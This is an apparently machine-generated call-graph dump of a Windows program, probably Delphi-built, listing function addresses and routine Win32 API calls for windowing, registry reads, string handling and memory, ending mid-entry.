50980->50981 50983 42caf2 50980->50983 50987 42c444 IsDBCSLeadByte 50980->50987 50981->50980 50984 42cb36 50983->50984 50988 4037b8 50983->50988 50993 42c444 IsDBCSLeadByte 50983->50993 50984->50904 50987->50980 50989 403744 4 API calls 50988->50989 50991 4037c6 50989->50991 50990 4037fc 50990->50983 50991->50990 50992 4038a4 4 API calls 50991->50992 50992->50990 50993->50983 50994->50914 50995->50918 50996->50929 51000 42c67c 50997->51000 51003 42c68d 51000->51003 51001 42c6f1 51004 42c6ec 51001->51004 51008 42c444 IsDBCSLeadByte 51001->51008 51003->51001 51006 42c6ab 51003->51006 51006->51004 51007 42c444 IsDBCSLeadByte 51006->51007 51007->51006 51008->51004 51044 407908 51041->51044 51045 407925 51044->51045 51052 4075b8 51045->51052 51048 407951 51050 4034e0 4 API calls 51048->51050 51051 407903 51050->51051 51051->50534 51055 4075d3 51052->51055 51053 4075e5 51053->51048 51057 4069a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51053->51057 51055->51053 51058 4076da 19 API calls 51055->51058 51059 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51055->51059 51057->51048 51058->51055 51059->51055 51085 42cbc0 6 API calls 51084->51085 51086 42ccee 51085->51086 51087 42ccf6 GetFileAttributesA 51086->51087 51088 403400 4 API calls 51087->51088 51089 42cd13 51088->51089 51089->50523 51089->50833 51090->50551 51093 46a787 51091->51093 51092 46abff 51095 46ac1a 51092->51095 51096 46ac4b 51092->51096 51093->51092 51094 46a842 51093->51094 51097 403494 4 API calls 51093->51097 51100 46a863 51094->51100 51101 46a8a4 51094->51101 51098 403494 4 API calls 51095->51098 51099 403494 4 API calls 51096->51099 51103 46a7c6 51097->51103 51104 46ac28 51098->51104 51105 46ac59 51099->51105 51102 403494 4 API calls 51100->51102 51109 403400 4 API calls 51101->51109 51106 46a871 51102->51106 51107 414ae8 4 API calls 51103->51107 51203 46915c 12 API calls 51104->51203 51204 46915c 12 API calls 51105->51204 51111 414ae8 4 API calls 51106->51111 51112 46a7e7 51107->51112 51113 46a8a2 51109->51113 51115 46a892 51111->51115 51177 403634 51112->51177 51133 46a988 51113->51133 51183 469868 51113->51183 51114 46ac36 51117 403400 4 API calls 51114->51117 51118 403634 4 API calls 51115->51118 51121 46ac7c 51117->51121 51118->51113 51126 403400 4 API calls 51121->51126 51122 46aa10 51124 403400 4 API calls 51122->51124 51129 46aa0e 51124->51129 51125 46a8c4 51130 46a902 51125->51130 51131 46a8ca 51125->51131 51127 46ac84 51126->51127 51132 403420 4 API calls 51127->51132 51198 469ca4 43 API calls 51129->51198 51134 403400 4 API calls 51130->51134 51135 403494 4 API calls 51131->51135 51137 46ac91 51132->51137 51133->51122 51138 46a9cf 51133->51138 51139 46a900 51134->51139 51136 46a8d8 51135->51136 51189 47c26c 51136->51189 51137->50558 51143 403494 4 API calls 51138->51143 51192 469b5c 51139->51192 51147 46a9dd 51143->51147 51145 46aa39 51154 46aa44 51145->51154 51155 46aa9a 51145->51155 51146 46a8f0 51149 403634 4 API calls 51146->51149 51150 414ae8 4 API calls 51147->51150 51149->51139 51152 46a9fe 51150->51152 51156 403634 4 API calls 51152->51156 51153 46a929 51159 46a934 51153->51159 51160 46a98a 51153->51160 51158 403494 4 API calls 51154->51158 51157 403400 4 API calls 51155->51157 51156->51129 51163 46aaa2 51157->51163 51165 46aa52 51158->51165 51162 403494 4 API calls 51159->51162 51161 403400 4 API calls 51160->51161 51161->51133 51167 46a942 51162->51167 51175 46ab4b 51163->51175 51199 494c90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51163->51199 51165->51163 51169 403634 4 API calls 51165->51169 51171 46aa98 51165->51171 51166 46aac5 51166->51175 51200 494f3c 18 API calls 51166->51200 51167->51133 51170 403634 4 API calls 51167->51170 51169->51165 51170->51167 51171->51163 51173 46abec 51202 429144 SendMessageA SendMessageA 51173->51202 51201 4290f4 SendMessageA 51175->51201 51176->50559 51178 40363c 51177->51178 51179 4034bc 4 API calls 51178->51179 51180 40364f 51179->51180 51181 403450 4 API calls 51180->51181 51182 403677 51181->51182 51205 42a040 SendMessageA 51183->51205 51185 469877 51186 469897 51185->51186 51206 42a040 SendMessageA 51185->51206 51186->51125 51188 469887 51188->51125 51207 47c2b4 51189->51207 51196 469b89 51192->51196 51193 469beb 51194 403400 4 API calls 51193->51194 51195 469c00 51194->51195 51195->51153 51196->51193 51552 469ae0 43 API calls 51196->51552 51198->51145 51199->51166 51200->51175 51201->51173 51202->51092 51203->51114 51204->51114 51205->51185 51206->51188 51208 403494 4 API calls 51207->51208 51215 47c2e7 51208->51215 51209 47c3f9 51210 403420 4 API calls 51209->51210 51211 47c289 51210->51211 51211->51146 51213 403778 4 API calls 51213->51215 51215->51209 51215->51213 51218 4037b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51215->51218 51219 47b100 51215->51219 51463 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51215->51463 51464 403800 51215->51464 51468 42c97c CharPrevA 51215->51468 51218->51215 51220 47b152 51219->51220 51221 47b130 51219->51221 51222 47b172 51220->51222 51223 47b160 51220->51223 51221->51220 51473 47a030 19 API calls 51221->51473 51226 47b1d5 51222->51226 51227 47b180 51222->51227 51224 403494 4 API calls 51223->51224 51278 47b16d 51224->51278 51236 47b1f6 51226->51236 51237 47b1e3 51226->51237 51229 47b1af 51227->51229 51230 47b189 51227->51230 51228 403400 4 API calls 51231 47baf8 51228->51231 51233 47b1c2 51229->51233 51475 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51229->51475 51232 47b19c 51230->51232 51474 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51230->51474 51235 403400 4 API calls 51231->51235 51239 403494 4 API calls 51232->51239 51234 403494 4 API calls 51233->51234 51234->51278 51241 47bb00 51235->51241 51243 47b217 51236->51243 51244 47b204 51236->51244 51242 403494 4 API calls 51237->51242 51239->51278 51241->51215 51242->51278 51246 47b267 51243->51246 51247 47b225 51243->51247 51245 403494 4 API calls 51244->51245 51245->51278 51254 47b275 51246->51254 51255 47b288 51246->51255 51248 47b241 51247->51248 51249 47b22e 51247->51249 51251 47b254 51248->51251 51476 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51248->51476 51250 403494 4 API calls 51249->51250 51250->51278 51253 403494 4 API calls 51251->51253 51253->51278 51256 403494 4 API calls 51254->51256 51257 47b296 51255->51257 51258 47b2a9 51255->51258 51256->51278 51259 403494 4 API calls 51257->51259 51260 47b2b7 51258->51260 51261 47b2ca 51258->51261 51259->51278 51262 403494 4 API calls 51260->51262 51263 47b2eb 51261->51263 51264 47b2d8 51261->51264 51262->51278 51266 47b327 51263->51266 51267 47b2f9 51263->51267 51265 403494 4 API calls 51264->51265 51265->51278 51272 47b335 51266->51272 51277 47b364 51266->51277 51268 47b315 51267->51268 51269 47b302 51267->51269 51271 47c26c 43 API calls 51268->51271 51270 403494 4 API calls 51269->51270 51270->51278 51271->51278 51273 47b351 51272->51273 51274 47b33e 51272->51274 51276 403494 4 API calls 51273->51276 51275 403494 4 API calls 51274->51275 51275->51278 51276->51278 51279 47b372 51277->51279 51280 47b3a0 51277->51280 51278->51228 51281 47b38e 51279->51281 51282 47b37b 51279->51282 51285 47b3ae 51280->51285 51286 47b3dd 51280->51286 51463->51215 51465 40382f 51464->51465 51466 403804 51464->51466 51465->51215 51467 4038a4 4 API calls 51466->51467 51467->51465 51468->51215 51473->51221 51474->51232 51475->51233 51476->51251 51552->51196 51554 47dd56 51553->51554 51555 47dd19 51553->51555 51554->50565 51585 455d0c 51555->51585 51559 47dd6d 51559->50565 51704 466714 51560->51704 51563->50573 51565 42f56c 51564->51565 51566 42f58f GetActiveWindow GetFocus 51565->51566 51567 41eea4 2 API calls 51566->51567 51568 42f5a6 51567->51568 51569 42f5c3 51568->51569 51570 42f5b3 RegisterClassA 51568->51570 51571 42f652 SetFocus 51569->51571 51572 42f5d1 CreateWindowExA 51569->51572 51570->51569 51573 403400 4 API calls 51571->51573 51572->51571 51574 42f604 51572->51574 51575 42f66e 51573->51575 51735 42427c 51574->51735 51580 494f3c 18 API calls 51575->51580 51577 42f62c 51578 42f634 CreateWindowExA 51577->51578 51578->51571 51579 42f64a ShowWindow 51578->51579 51579->51571 51580->50611 51741 44b514 51581->51741 51586 455d1d 51585->51586 51587 455d21 51586->51587 51588 455d2a 51586->51588 51611 455a10 51587->51611 51619 455af0 29 API calls 51588->51619 51591 455d27 51591->51554 51592 47d970 51591->51592 51597 47da6c 51592->51597 51599 47d9b0 51592->51599 51593 403420 4 API calls 51594 47db4f 51593->51594 51594->51559 51604 47dabd 51597->51604 51607 47da0f 51597->51607 51674 479630 51597->51674 51599->51597 51600 47da18 51599->51600 51603 47c26c 43 API calls 51599->51603 51599->51607 51648 479770 51599->51648 51659 4798d4 51599->51659 51600->51599 51605 47c26c 43 API calls 51600->51605 51610 47da59 51600->51610 51663 42c92c 51600->51663 51668 42c954 51600->51668 51673 47d67c 52 API calls 51600->51673 51601 47c26c 43 API calls 51601->51604 51602 454100 20 API calls 51602->51604 51603->51599 51604->51597 51604->51601 51604->51602 51604->51610 51605->51600 51607->51593 51610->51607 51620 42de1c 51611->51620 51613 455a2d 51614 455a7b 51613->51614 51623 455944 51613->51623 51614->51591 51617 455944 6 API calls 51618 455a5c RegCloseKey 51617->51618 51618->51591 51619->51591 51621 42de27 51620->51621 51622 42de2d RegOpenKeyExA 51620->51622 51621->51622 51622->51613 51628 42dd58 51623->51628 51625 45596c 51626 403420 4 API calls 51625->51626 51627 4559f6 51626->51627 51627->51617 51631 42dc00 51628->51631 51632 42dc26 RegQueryValueExA 51631->51632 51637 42dc49 51632->51637 51647 42dc6b 51632->51647 51633 403400 4 API calls 51635 42dd37 51633->51635 51634 42dc63 51636 403400 4 API calls 51634->51636 51635->51625 51636->51647 51637->51634 51638 4034e0 4 API calls 51637->51638 51639 403744 4 API calls 51637->51639 51637->51647 51638->51637 51640 42dca0 RegQueryValueExA 51639->51640 51640->51632 51641 42dcbc 51640->51641 51642 4038a4 4 API calls 51641->51642 51641->51647 51643 42dcfe 51642->51643 51644 42dd10 51643->51644 51646 403744 4 API calls 51643->51646 51645 403450 4 API calls 51644->51645 51645->51647 51646->51644 51647->51633 51649 479786 51648->51649 51650 479782 51648->51650 51651 403450 4 API calls 51649->51651 51650->51599 51652 479793 51651->51652 51653 4797b3 51652->51653 51654 479799 51652->51654 51656 479630 19 API calls 51653->51656 51655 479630 19 API calls 51654->51655 51657 4797af 51655->51657 51656->51657 51658 403400 4 API calls 51657->51658 51658->51650 51661 4798e0 51659->51661 51660 4798fb 51660->51599 51661->51660 51686 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51661->51686 51687 42c79c 51663->51687 51666 403778 4 API calls 51667 42c94e 51666->51667 51667->51600 51669 42c79c IsDBCSLeadByte 51668->51669 51670 42c964 51669->51670 51671 403778 4 API calls 51670->51671 51672 42c975 51671->51672 51672->51600 51673->51600 51675 47964b 51674->51675 51678 47967c 51675->51678 51685 47970a 51675->51685 51699 4794e4 19 API calls 51675->51699 51676 4796a1 51682 4796c2 51676->51682 51701 4794e4 19 API calls 51676->51701 51678->51676 51700 4794e4 19 API calls 51678->51700 51681 479702 51693 479368 51681->51693 51682->51681 51682->51685 51702 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51682->51702 51685->51597 51686->51660 51688 42c67c IsDBCSLeadByte 51687->51688 51690 42c7b1 51688->51690 51689 42c7fb 51689->51666 51690->51689 51692 42c444 IsDBCSLeadByte 51690->51692 51692->51690 51694 4793a3 51693->51694 51695 403450 4 API calls 51694->51695 51696 4793c8 51695->51696 51703 477a58 19 API calls 51696->51703 51698 479409 51698->51685 51699->51678 51700->51676 51701->51682 51702->51681 51703->51698 51705 403494 4 API calls 51704->51705 51706 466742 51705->51706 51721 42dbc8 51706->51721 51709 42dbc8 5 API calls 51710 466766 51709->51710 51711 466600 19 API calls 51710->51711 51712 466770 51711->51712 51713 42dbc8 5 API calls 51712->51713 51714 46677f 51713->51714 51724 466678 51714->51724 51717 42dbc8 5 API calls 51718 466798 51717->51718 51719 403400 4 API calls 51718->51719 51720 4667ad 51719->51720 51720->50569 51728 42db10 51721->51728 51725 466698 51724->51725 51726 4078f4 19 API calls 51725->51726 51727 4666e2 51726->51727 51727->51717 51729 42dbbb 51728->51729 51730 42db30 51728->51730 51729->51709 51730->51729 51731 4037b8 4 API calls 51730->51731 51733 403800 4 API calls 51730->51733 51734 42c444 IsDBCSLeadByte 51730->51734 51731->51730 51733->51730 51734->51730 51736 4242ae 51735->51736 51737 42428e GetWindowTextA 51735->51737 51739 403494 4 API calls 51736->51739 51738 4034e0 4 API calls 51737->51738 51740 4242ac 51738->51740 51739->51740 51740->51577 51744 44b38c 51741->51744 51745 44b3bf 51744->51745 51746 414ae8 4 API calls 51745->51746 51747 44b3d2 51746->51747 51748 44b3ff GetDC 51747->51748 51749 40357c 4 API calls 51747->51749 51755 41a1e8 51748->51755 51749->51748 51752 44b430 51763 44b0c0 51752->51763 51756 41a213 51755->51756 51757 41a2af 51755->51757 51774 403520 51756->51774 51758 403400 4 API calls 51757->51758 51759 41a2c7 SelectObject 51758->51759 51759->51752 51761 41a26b 51775 4034e0 4 API calls 51774->51775 51776 40352a 51775->51776 51776->51761 51780 4652d7 51777->51780 51778 4653b2 51788 46708c 51778->51788 51779 46536a 51779->51778 51806 4185b8 7 API calls 51779->51806 51780->51778 51783 465327 51780->51783 51800 421a1c 51780->51800 51783->51779 51784 465361 51783->51784 51785 46536c 51783->51785 51786 421a1c 7 API calls 51784->51786 51787 421a1c 7 API calls 51785->51787 51786->51779 51787->51779 51789 4670bc 51788->51789 51790 46709d 51788->51790 51789->50630 51791 414b18 4 API calls 51790->51791 51792 4670ab 51791->51792 51793 414b18 4 API calls 51792->51793 51793->51789 51801 421a74 51800->51801 51803 421a2a 51800->51803 51801->51783 51802 421a59 51802->51801 51815 421d28 SetFocus GetFocus 51802->51815 51803->51802 51807 408cbc 51803->51807 51806->51778 51808 408cc8 51807->51808 51816 406dec LoadStringA 51808->51816 51811 403450 4 API calls 51812 408cf9 51811->51812 51813 403400 4 API calls 51812->51813 51814 408d0e 51813->51814 51814->51802 51815->51801 51817 4034e0 4 API calls 51816->51817 51818 406e19 51817->51818 51818->51811 51867 46c7a5 51866->51867 51868 414ae8 4 API calls 51867->51868 51883 46c7f2 51867->51883 51869 46c7bb 51868->51869 52073 466924 6 API calls 51869->52073 51870 403420 4 API calls 51872 46c89c 51870->51872 51872->50710 52065 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51872->52065 51873 46c7c3 51874 414b18 4 API calls 51873->51874 51875 46c7d1 51874->51875 51876 46c7de 51875->51876 51878 46c7f7 51875->51878 52074 47efd0 42 API calls 51876->52074 51879 46c80f 51878->51879 51881 466a08 CharNextA 51878->51881 52075 47efd0 42 API calls 51879->52075 51882 46c80b 51881->51882 51882->51879 51884 46c825 51882->51884 51883->51870 51885 46c841 51884->51885 51886 46c82b 51884->51886 51888 42c99c CharNextA 51885->51888 52076 47efd0 42 API calls 51886->52076 51889 46c84e 51888->51889 51889->51883 52077 466a94 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51889->52077 51891 46c865 51892 451458 4 API calls 51891->51892 51893 46c872 51892->51893 52078 47efd0 42 API calls 51893->52078 51896 4241ed SetActiveWindow 51895->51896 51900 424223 51895->51900 52079 42364c 51896->52079 51900->50722 51900->50723 51901 42420a 51901->51900 51902 42421d SetFocus 51901->51902 51902->51900 51904 482505 51903->51904 51905 4824d7 51903->51905 51907 475bd0 51904->51907 52092 494cec 18 API calls 51905->52092 52093 457d10 51907->52093 52066->50718 52073->51873 52074->51883 52075->51883 52076->51883 52077->51891 52078->51883 52088 4235f8 SystemParametersInfoA 52079->52088 52082 423665 ShowWindow 52084 423670 52082->52084 52085 423677 52082->52085 52091 423628 SystemParametersInfoA 52084->52091 52087 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 52085->52087 52087->51901 52089 423616 52088->52089 52089->52082 52090 423628 SystemParametersInfoA 52089->52090 52090->52082 52091->52085 52092->51904 52094 457e44 52093->52094 52095 457d3c 52093->52095 52096 457e95 52094->52096 52569 45757c 6 API calls 52094->52569 52565 457a0c GetSystemTimeAsFileTime FileTimeToSystemTime 52095->52565 52099 403400 4 API calls 52096->52099 52101 457eaa 52099->52101 52100 457d44 52102 4078f4 19 API calls 52100->52102 52114 4072a8 52101->52114 52103 457db5 52102->52103 52566 457d00 20 API calls 52103->52566 52105 403778 4 API calls 52109 457dbd 52105->52109 52109->52105 52115 403738 52114->52115 52116 4072b2 SetCurrentDirectoryA 52115->52116 52565->52100 52566->52109 52569->52096 53758 431eec 53719->53758 53721 43d9f2 53722 403400 4 API calls 53721->53722 53723 43da76 53722->53723 53723->50779 53723->50780 53725 431bd6 53724->53725 53726 402648 4 API calls 53725->53726 53727 431c06 53726->53727 53728 4947f8 53727->53728 53729 4948cd 53728->53729 53730 494812 53728->53730 53735 494910 53729->53735 53730->53729 53732 433d6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53730->53732 53734 403450 4 API calls 53730->53734 53763 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53730->53763 53764 431ca0 53730->53764 53732->53730 53734->53730 53736 49492c 53735->53736 53772 433d6c 53736->53772 53738 494931 53739 431ca0 4 API calls 53738->53739 53740 49493c 53739->53740 53741 43d594 53740->53741 53742 43d5c1 53741->53742 53743 43d5b3 53741->53743 53742->50790 53743->53742 53744 43d63d 53743->53744 53748 447084 4 API calls 53743->53748 53751 43d6f7 53744->53751 53775 447084 53744->53775 53746 43d688 53781 43dd50 53746->53781 53748->53743 53749 43d8fd 53749->53742 53801 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53749->53801 53751->53749 53752 43d8de 53751->53752 53799 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53751->53799 53800 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53752->53800 53755->50792 53756->50794 53757->50781 53759 403494 4 API calls 53758->53759 53761 431efb 53759->53761 53760 431f25 53760->53721 53761->53760 53762 403744 4 API calls 53761->53762 53762->53761 53763->53730 53765 431cc0 53764->53765 53766 431cae 53764->53766 53768 431ce2 53765->53768 53771 431c40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53765->53771 53770 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53766->53770 53768->53730 53770->53765 53771->53768 53773 402648 4 API calls 53772->53773 53774 433d7b 53773->53774 53774->53738 53776 4470a3 53775->53776 53777 4470aa 53775->53777 53802 446e30 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53776->53802 53779 431ca0 4 API calls 53777->53779 53780 4470ba 53779->53780 53780->53746 53782 43dd6c 53781->53782 53787 43dd99 53781->53787 53783 402660 4 API calls 53782->53783 53782->53787 53783->53782 53784 43ddce 53784->53751 53786 43fea5 53786->53784 53812 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53786->53812 53787->53784 53787->53786 53788 43c938 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53788 53790 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53790 53793 446e30 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53793 53795 433d18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53795 53796 436650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53796 53797 431c40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53797 53798 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53798 53803 4396e0 53787->53803 53809 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53809 53810 43dc48 18 API calls 53787->53810 53811 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53811 53788->53787 53790->53787 53793->53787 53795->53787 53796->53787 53797->53787 53798->53787 53799->53751 53800->53749 53801->53749 53802->53777 53804 4396e9 53803->53804 53805 403400 4 API calls 53804->53805 53809->53787 53810->53787 53811->53787 53812->53786 53815 41fb58 53816 41fb61 53815->53816 53819 41fdfc 53816->53819 53818 41fb6e 53820 41feee 53819->53820 53821 41fe13 53819->53821 53820->53818 53821->53820 53840 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53821->53840 53823 41fe49 53824 41fe73 53823->53824 53825 41fe4d 53823->53825 53850 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53824->53850 53841 41fb9c 53825->53841 53829 41fe81 53831 41fe85 53829->53831 53832 41feab 53829->53832 53830 41fb9c 10 API calls 53839 41fe71 53830->53839 53833 41fb9c 10 API calls 53831->53833 53834 41fb9c 10 API calls 53832->53834 53835 41fe97 53833->53835 53836 41febd 53834->53836 53838 41fb9c 10 API calls 53835->53838 53837 41fb9c 10 API calls 53836->53837 53837->53839 53838->53839 53839->53818 53840->53823 53842 41fbb7 53841->53842 53843 41fbcd 53842->53843 53844 41f93c 4 API calls 53842->53844 53851 41f93c 53843->53851 53844->53843 53846 41fc15 53847 41fc38 SetScrollInfo 53846->53847 53859 41fa9c 53847->53859 53850->53829 53852 4181e0 53851->53852 53853 41f959 GetWindowLongA 53852->53853 53854 41f996 53853->53854 53855 41f976 53853->53855 53871 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53854->53871 53870 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53855->53870 53858 41f982 53858->53846 53860 41faaa 53859->53860 53861 41fab2 53859->53861 53860->53830 53862 41faf1 53861->53862 53863 41fae1 53861->53863 53869 41faef 53861->53869 53873 417e48 IsWindowVisible ScrollWindow SetWindowPos 53862->53873 53872 417e48 IsWindowVisible ScrollWindow SetWindowPos 53863->53872 53864 41fb31 GetScrollPos 53864->53860 53867 41fb3c 53864->53867 53868 41fb4b SetScrollPos 53867->53868 53868->53860 53869->53864 53870->53858 53871->53858 53872->53869 53873->53869 53874 420598 53875 4205ab 53874->53875 53895 415b30 53875->53895 53877 4206f2 53878 420709 53877->53878 53902 4146d4 KiUserCallbackDispatcher 53877->53902 53882 420720 53878->53882 53903 414718 KiUserCallbackDispatcher 53878->53903 53879 420651 53900 420848 20 API calls 53879->53900 53880 4205e6 53880->53877 53880->53879 53888 420642 MulDiv 53880->53888 53884 420742 53882->53884 53904 420060 12 API calls 53882->53904 53886 42066a 53886->53877 53901 420060 12 API calls 53886->53901 53899 41a304 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 53888->53899 53891 420687 53892 4206a3 MulDiv 53891->53892 53893 4206c6 53891->53893 53892->53893 53893->53877 53894 4206cf MulDiv 53893->53894 53894->53877 53896 415b42 53895->53896 53905 414470 53896->53905 53898 415b5a 53898->53880 53899->53879 53900->53886 53901->53891 53902->53878 53903->53882 53904->53884 53906 41448a 53905->53906 53909 410458 53906->53909 53908 4144a0 53908->53898 53912 40dca4 53909->53912 53911 41045e 53911->53908 53913 40dd06 53912->53913 53914 40dcb7 53912->53914 53919 40dd14 53913->53919 53917 40dd14 19 API calls 53914->53917 53918 40dce1 53917->53918 53918->53911 53920 40dd24 53919->53920 53922 40dd3a 53920->53922 53931 40e09c 53920->53931 53947 40d5e0 53920->53947 53950 40df4c 53922->53950 53925 40d5e0 5 API calls 53926 40dd42 53925->53926 53926->53925 53927 40ddae 53926->53927 53953 40db60 53926->53953 53928 40df4c 5 API calls 53927->53928 53930 40dd10 53928->53930 53930->53911 53967 40e96c 53931->53967 53933 403778 4 API calls 53935 40e0d7 53933->53935 53934 40e18d 53936 40e1b7 53934->53936 53937 40e1a8 53934->53937 53935->53933 53935->53934 54030 40d774 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53935->54030 54031 40e080 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53935->54031 54027 40ba24 53936->54027 53976 40e3c0 53937->53976 53943 40e1b5 53944 403400 4 API calls 53943->53944 53945 40e25c 53944->53945 53945->53920 53948 40ea08 5 API calls 53947->53948 53949 40d5ea 53948->53949 53949->53920 54064 40d4bc 53950->54064 54073 40df54 53953->54073 53956 40e96c 5 API calls 53957 40db9e 53956->53957 53958 40e96c 5 API calls 53957->53958 53959 40dba9 53958->53959 53960 40dbc4 53959->53960 53961 40dbbb 53959->53961 53966 40dbc1 53959->53966 54080 40d9d8 53960->54080 54083 40dac8 19 API calls 53961->54083 53964 403420 4 API calls 53965 40dc8f 53964->53965 53965->53926 53966->53964 54033 40d780 53967->54033 53970 4034e0 4 API calls 53971 40e98f 53970->53971 53972 403744 4 API calls 53971->53972 53973 40e996 53972->53973 53974 40d780 5 API calls 53973->53974 53975 40e9a4 53974->53975 53975->53935 53977 40e3ec 53976->53977 53979 40e3f6 53976->53979 54038 40d440 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53977->54038 53980 40e511 53979->53980 53981 40e495 53979->53981 53982 40e4f6 53979->53982 53983 40e576 53979->53983 53984 40e438 53979->53984 53985 40e4d9 53979->53985 53986 40e47a 53979->53986 53987 40e4bb 53979->53987 53998 40e45c 53979->53998 53990 40d764 5 API calls 53980->53990 54046 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53981->54046 54051 40e890 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53982->54051 53994 40d764 5 API calls 53983->53994 54039 40d764 53984->54039 54049 40e9a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53985->54049 54045 40d818 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53986->54045 54048 40dde4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53987->54048 53999 40e519 53990->53999 53993 403400 4 API calls 54000 40e5eb 53993->54000 54001 40e57e 53994->54001 53997 40e4a0 54047 40d470 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53997->54047 53998->53993 54007 40e523 53999->54007 54008 40e51d 53999->54008 54000->53943 54009 40e582 54001->54009 54010 40e59b 54001->54010 54002 40e4e4 54050 409d38 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54002->54050 54004 40e461 54044 40ded8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54004->54044 54005 40e444 54042 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54005->54042 54052 40ea08 54007->54052 54015 40e521 54008->54015 54016 40e53c 54008->54016 54018 40ea08 5 API calls 54009->54018 54058 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54010->54058 54056 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54015->54056 54019 40ea08 5 API calls 54016->54019 54018->53998 54021 40e544 54019->54021 54020 40e44f 54043 40e26c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54020->54043 54055 40d8a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54021->54055 54024 40e566 54057 40e2d4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54024->54057 54059 40b9d0 54027->54059 54030->53935 54031->53935 54032 40d774 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54032->53943 54035 40d78b 54033->54035 54034 40d7c5 54034->53970 54035->54034 54037 40d7cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54035->54037 54037->54035 54038->53979 54040 40ea08 5 API calls 54039->54040 54041 40d76e 54040->54041 54041->54004 54041->54005 54042->54020 54043->53998 54044->53998 54045->53998 54046->53997 54047->53998 54048->53998 54049->54002 54050->53998 54051->53998 54053 40d780 5 API calls 54052->54053 54054 40ea15 54053->54054 54054->53998 54055->53998 54056->54024 54057->53998 54058->53998 54060 40b9e2 54059->54060 54061 40ba07 54059->54061 54060->54061 54063 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54060->54063 54061->53943 54061->54032 54063->54061 54065 40ea08 5 API calls 54064->54065 54067 40d4c9 54065->54067 54066 40d4dc 54066->53926 54067->54066 54071 40eb0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54067->54071 54069 40d4d7 54072 40d458 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54069->54072 54071->54069 54072->54066 54074 40d764 5 API calls 54073->54074 54075 40df6b 54074->54075 54076 40ea08 5 API calls 54075->54076 54079 40db93 54075->54079 54077 40df78 54076->54077 54077->54079 54084 40ded8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54077->54084 54079->53956 54085 40ab7c 19 API calls 54080->54085 54082 40da00 54082->53966 54083->53966 54084->54079 54085->54082 56290 41363c SetWindowLongA GetWindowLongA 56291 413699 SetPropA SetPropA 56290->56291 56292 41367b GetWindowLongA 56290->56292 56297 41f39c 56291->56297 56292->56291 56293 41368a SetWindowLongA 56292->56293 56293->56291 56302 415270 56297->56302 56309 423c0c 56297->56309 56403 423a84 56297->56403 56298 4136e9 56303 41527d 56302->56303 56304 4152e3 56303->56304 56305 4152d8 56303->56305 56308 4152e1 56303->56308 56410 424b8c 13 API calls 56304->56410 56305->56308 56411 41505c 46 API calls 56305->56411 56308->56298 56312 423c42 56309->56312 56328 423c63 56312->56328 56412 423b68 56312->56412 56313 423cec 56315 423cf3 56313->56315 56316 423d27 56313->56316 56314 423c8d 56317 423c93 56314->56317 56318 423d50 56314->56318 56323 423cf9 56315->56323 56361 423fb1 56315->56361 56319 423d32 56316->56319 56320 42409a IsIconic 56316->56320 56324 